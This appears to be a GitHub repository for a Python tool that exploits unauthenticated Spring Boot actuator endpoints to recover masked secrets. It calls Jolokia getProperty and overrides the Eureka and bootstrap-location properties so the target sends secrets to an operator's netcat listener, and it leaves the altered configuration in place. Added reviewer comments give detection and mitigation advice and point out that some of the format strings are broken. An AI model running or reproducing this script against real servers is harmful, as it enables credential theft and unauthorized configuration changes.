├── README.md
├── SpringBootEnvDecrypt.py
└── test.png

/README.md:
--------------------------------------------------------------------------------
# SpringBootEnvDecrypt
SpringBoot获取被星号脱敏的密码的明文

懒癌发作,随手撸一个脚本

![](https://github.com/heikanet/SpringBootEnvDecrypt/blob/main/test.png)

--------------------------------------------------------------------------------
/SpringBootEnvDecrypt.py:
--------------------------------------------------------------------------------
'''
Interactive script that queries a Spring Boot application's management
endpoints (Jolokia first, then env/refresh) for the value of one
configuration key.

refer:https://github.com/LandGrey/SpringBootVulExploit
author:说书人
github:https://github.com/heikanet

Reviewer notes (defensive reading of this file):
- Every request goes to /jolokia, /env or /refresh (menu option 1) or to the
  same endpoints under /actuator/ (any other choice). No credentials are
  sent, so the script only gets answers from management endpoints that are
  reachable without authentication.
- env() does not only read: it POSTs a property override and then calls the
  refresh endpoint, and nothing in this file restores the previous value.
- Useful signals in access logs and traffic: POSTs to these paths whose body
  names `getProperty` on the two MBeans below, or that set
  `eureka.client.serviceUrl.defaultZone` / `spring.cloud.bootstrap.location`.
- Mitigation: keep jolokia/env/refresh off untrusted networks, require
  authentication on management endpoints, and keep the actuator exposure
  list (`management.endpoints.web.exposure.include`) to what is needed.
- NOTE(review): block nesting below was reconstructed from a flattened
  listing; confirm it against the repository.
'''

import requests
import json
import urllib3
# Silences the warning urllib3 emits for unverified HTTPS requests. Every
# requests.post() call below passes verify=False, so server certificates are
# never validated and a response cannot be tied to the intended host.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# NOTE(review): defined but never used; no call in this file passes proxies=.
proxy={'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}

def jolokia(url,type,key):
    '''
    Ask the Jolokia endpoint for the value of property `key` and print it.

    url  -- base URL; the endpoint path is appended to it unchanged.
    type -- '1' selects /jolokia (menu: spring 1.x); any other value selects
            /actuator/jolokia. NOTE(review): the name shadows the builtin.
    key  -- property name, sent as the single argument of `getProperty`.

    Returns None; every outcome is reported with print(). The Admin MBean is
    tried first and the EnvironmentManager MBean only when the first reply
    has no 'value' key. No timeout is passed, so a silent host blocks the
    call for as long as requests is willing to wait.
    '''
    headers = {'Content-Type': 'application/json'}
    if type=='1':
        try:
            # Jolokia EXEC request: invoke getProperty(key) on the Spring Boot Admin MBean.
            data = {"mbean": "org.springframework.boot:name=SpringApplication,type=Admin", "operation": "getProperty",
                    "type": "EXEC", "arguments": [key]}
            res=requests.post(url+'/jolokia',data=json.dumps(data),headers=headers,verify=False).json()
            if 'value' in res.keys():
                # Message: "jolokia interface 1 succeeded, the value of [key] is: ..."
                print('[+]jolokia接口1利用成功,[{}]的值为:{}'.format(key,res['value']))
            else:
                # Message: "jolokia interface 1 failed"; fall back to the Spring Cloud MBean.
                print('[-]jolokia接口1利用失败')
                data = {
                    "mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager",
                    "operation": "getProperty", "type": "EXEC", "arguments": [key]}
                res = requests.post(url + '/jolokia', data=json.dumps(data), headers=headers, verify=False).json()
                if 'value' in res.keys():
                    print('[+]jolokia接口2利用成功,[{}]的值为:{}'.format(key, res['value']))
                else:
                    print('[-]jolokia接口2利用失败')
        except:
            # Bare except: connection errors, a non-JSON body and even
            # KeyboardInterrupt all end up as "jolokia endpoint access failed".
            print('[error]jolokia接口访问失败')
    else:
        try:
            # Same two requests as above, against the /actuator/ prefixed path.
            data = {"mbean": "org.springframework.boot:name=SpringApplication,type=Admin", "operation": "getProperty",
                    "type": "EXEC", "arguments": [key]}
            res = requests.post(url + '/actuator/jolokia', data=json.dumps(data), headers=headers,verify=False).json()
            if 'value' in res.keys():
                print('[+]jolokia接口1利用成功,[{}]的值为:{}'.format(key,res['value']))
            else:
                print('[-]jolokia接口1利用失败')
                data = {
                    "mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager",
                    "operation": "getProperty", "type": "EXEC", "arguments": [key]}
                res = requests.post(url + '/actuator/jolokia', data=json.dumps(data), headers=headers,
                                    verify=False).json()
                if 'value' in res.keys():
                    print('[+]jolokia接口2利用成功,[{}]的值为:{}'.format(key, res['value']))
                else:
                    print('[-]jolokia接口2利用失败')
        except:
            # Same catch-all as the 1.x branch.
            print('[error]jolokia接口访问失败')


def env(url,type,key):
    '''
    Override a property through the env endpoint, trigger a refresh, and ask
    the operator whether their own HTTP listener received a request.

    url  -- base URL; endpoint paths are appended to it unchanged.
    type -- '1' posts form-encoded data to /env and /refresh; any other value
            posts JSON to /actuator/env and /actuator/refresh.
    key  -- property name the operator wants resolved.

    Returns None. Up to three overrides are sent, each followed by a refresh;
    the next one is sent only when the operator answers '2' (failed).

    This function changes the target's runtime configuration: it sets
    `eureka.client.serviceUrl.defaultZone` and
    `spring.cloud.bootstrap.location` and never writes the old values back.
    A write to either property arriving over HTTP is worth alerting on.

    NOTE(review): as written, none of the format templates substitute `key`
    inside the `${...}` placeholder, and in the 1.x branch the second
    template raises ValueError in str.format before any request is sent; the
    bare except reports that as an access failure.
    '''
    # Messages: "trying the env endpoint" and "first listen on an HTTP port
    # on an external server you control, e.g. port 80".
    print('[*]尝试env接口')
    print('[*]先在自己控制的外网服务器上监听http端口:\n如监听80端口:nc -lvk 80')
    # Prompt: "enter the listening ip:port"; the answer is used without validation.
    IpPort=input('输入监听的ip:port==>')
    if type=='1':
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        try:
            # Attempt 1: override the Eureka service URL, then refresh.
            data = 'eureka.client.serviceUrl.defaultZone=http://value:${{}}@{}'.format(key, IpPort)
            requests.post(url+'/env',data=data,headers=headers,verify=False)
            requests.post(url + '/refresh', headers=headers, verify=False)
            # Responses are discarded; "sent successfully" only means no exception was raised.
            print('[*]env接口1请求发送成功,请查看服务器是否收到请求\n若没利用成功,可选择继续利用,请保持监听正常\n1.成功 2.失败')
            # Prompt: "choose" (1 = success, 2 = failed).
            IsOk=input('请选择:')
            if IsOk=='2':
                # Attempt 2: override the bootstrap location, then refresh.
                data = 'spring.cloud.bootstrap.location=http://{}}/?=${{}}'.format(IpPort,key)
                requests.post(url + '/env', data=data, headers=headers, verify=False)
                requests.post(url + '/refresh', headers=headers, verify=False)
                print('[*]env接口2请求发送成功,请查看服务器是否收到请求\n若没利用成功,可选择继续利用,请保持监听正常\n1.成功 2.失败')
                IsOk = input('请选择:')
                if IsOk == '2':
                    # Attempt 3: Eureka service URL again, with a different URL shape.
                    data = 'eureka.client.serviceUrl.defaultZone=http://{}}/${{}}'.format(IpPort, key)
                    requests.post(url + '/env', data=data, headers=headers, verify=False)
                    requests.post(url + '/refresh', headers=headers, verify=False)
                    print('[*]env接口3请求发送成功,请查看服务器是否收到请求\n若没利用成功,可以放弃了')
        except:
            # Bare except also covers the input() prompts above, so Ctrl-C or
            # EOF there is printed as "env endpoint access failed".
            print('[error]env接口访问失败')
    else:
        headers = {'Content-Type': 'application/json'}
        try:
            # Same three attempts as the 1.x branch, sent as {"name": ..., "value": ...} JSON.
            data = {"name":"eureka.client.serviceUrl.defaultZone","value":"http://value:${{}}@{}".format(key,IpPort)}
            requests.post(url + '/actuator/env', data=json.dumps(data), headers=headers, verify=False)
            requests.post(url + '/actuator/refresh', headers=headers, verify=False)
            print('[*]env接口1请求发送成功,请查看服务器是否收到请求\n若没利用成功,可选择继续利用,请保持监听正常\n1.成功 2.失败')
            IsOk = input('请选择:')
            if IsOk == '2':
                data = {"name":"spring.cloud.bootstrap.location","value":"http://{}/?=${{}}".format(IpPort, key)}
                requests.post(url + '/actuator/env', data=json.dumps(data), headers=headers, verify=False)
                requests.post(url + '/actuator/refresh', headers=headers, verify=False)
                print('[*]env接口2请求发送成功,请查看服务器是否收到请求\n若没利用成功,可选择继续利用,请保持监听正常\n1.成功 2.失败')
                IsOk = input('请选择:')
                if IsOk == '2':
                    data = {"name":"eureka.client.serviceUrl.defaultZone","value":"http://{}/${{}}".format(IpPort, key)}
                    requests.post(url + '/actuator/env', data=json.dumps(data), headers=headers, verify=False)
                    requests.post(url + '/actuator/refresh', headers=headers, verify=False)
                    print('[*]env接口3请求发送成功,请查看服务器是否收到请求\n若没利用成功,可以放弃了')
        except:
            # Same catch-all as the 1.x branch.
            print('[error]env接口访问失败')


# Banner text: "Spring Boot: get the password masked with asterisks".
banner='''==========Spring Boot获取被星号脱敏的密码=========='''
print(banner)
# Menu: 1 = spring 1.x, 2 = spring 2.x. Only the exact string '1' selects the
# un-prefixed paths; any other input falls through to the /actuator/ paths.
print('1.[spring 1.x版本] 2.[spring 2.x版本]')
# NOTE(review): rebinds the builtin `type` at module level.
type=input('请选择:')
# Prompts: "enter the key to fetch" and "enter url". Both values are used as
# typed; there is no validation, scheme check or trailing-slash handling.
key=input('输入要获取的key:')
url=input('输入url:')
# Both steps always run, in this order; env() is called even when jolokia()
# has already printed a value, so the configuration writes happen regardless.
jolokia(url,type,key)
env(url,type,key)
--------------------------------------------------------------------------------
/test.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ssrsec/SpringBootEnvDecrypt/46b76e6a287312ba294c8a65ef9c0d1c9468275f/test.png
--------------------------------------------------------------------------------